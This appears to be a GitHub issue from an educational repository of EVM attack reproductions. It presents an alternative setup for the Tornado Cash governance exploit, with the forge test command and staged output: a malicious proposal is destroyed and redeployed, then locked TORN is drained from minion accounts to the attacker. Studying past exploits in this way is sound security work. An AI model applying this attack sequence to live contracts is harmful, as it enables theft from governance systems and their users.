learn-evm-attacks icon indicating copy to clipboard operation
learn-evm-attacks copied to clipboard
verified publisher icon coinspect

Draft - Alternative setup for Tornado Cash Governance attack

Open nine-december opened this issue 2 years ago • 0 comments

Rationale

The following PR shows how the Tornado Cash attack would have succeeded even if the minions don't approve and lock zero torn when setting up the accounts.

Running:

forge test --match-contract=Exploit_TornadoCashGovernance -vvv

Outputs:

======== STAGE 0. DEPLOY FACTORY AND PROPOSAL - GET SOME TORN ========
  Proposal Factory deployed at: 0x728663deA5cFE23228d61A85a6696278dd5a0AE4
  Deploying initial proposal...
  Transient deployed at: 0xb49EBD4A1bd6d3633B9227D25164F33A8EB7786C
  Proposal 20 deployed at: 0x4AF4325d90a664889b2bEc9Ec53C44eEfB6D3089
  
======== STAGE 1. SUBMIT MALICIOUS PROPOSAL ========
  Submitting proposal...
  
======== STAGE 1.1 VOTE PROPOSAL ========
  Locking funds with voter...
  Funds successfully locked 

  Casting vote...
  Vote successfully casted
  
======== STAGE 2. DEPLOY AND PREPARE MULTIPLE ACCOUNTS ========
  MINIONS WON'T APPROVE AND LOCK ZERO TORN
  Deploying and preparing minion #1 at address: 0x9Da940b2Fd184E5c39CC0aE358B380C125a12158
  Deploying and preparing minion #2 at address: 0x60A5d1b2Ae271557c0da3f8dC4b4cFcb73D55784
  Deploying and preparing minion #3 at address: 0x0bA2c44fAc23fe39EbB66dF4aA02641C67372E78
  Deploying and preparing minion #4 at address: 0xfdd66B307434ADd7a7043075e30751f842Ec2f12
  Deploying and preparing minion #5 at address: 0xC31add2bAF18796DC6E7660EE4AB06b3E5571642
  
======== STAGE 3. DESTROY THE PROPOSAL AND TRANSIENT ========
  Triggering destruction of transient and proposal...
  Destroying proposal...
  Destroying transient...
  Successfully destroyed proposal and transient
  Fork Block Number: 17299106
  
======== STAGE 4. REDEPLOY THE PROPOSAL AND TRANSIENT ========
  Before Redeployment Code Size
  Transient: 0
  Proposal: 0 

  Deploying malicious proposal...
  Transient deployed at: 0xb49EBD4A1bd6d3633B9227D25164F33A8EB7786C
  Proposal 20 deployed at: 0x4AF4325d90a664889b2bEc9Ec53C44eEfB6D3089
  
After Redeployment Code Size
  Transient: 2548
  Proposal: 1061
  
======== STAGE 5. EXECUTE MALICIOUS PROPOSAL ========
  Executing malicious proposal...
  Execution successful
  
======== STAGE 6. DRAIN TORN FROM GOVERNANCE ========
  Draining TORN balance...
  Before Drain 
  Minion1 Locked Balance: 10000000000000000000000
  Minion2 Locked Balance: 10000000000000000000000
  Minion3 Locked Balance: 10000000000000000000000
  Minion4 Locked Balance: 10000000000000000000000
  Minion5 Locked Balance: 10000000000000000000000
  Attacker1 TORN Balance: 0
  
After Drain 
  Minion1 Locked Balance: 0
  Minion2 Locked Balance: 0
  Minion3 Locked Balance: 0
  Minion4 Locked Balance: 0
  Minion5 Locked Balance: 0
  Attacker1 TORN Balance: 50000000000000000000000

nine-december avatar May 29 '23 22:05 nine-december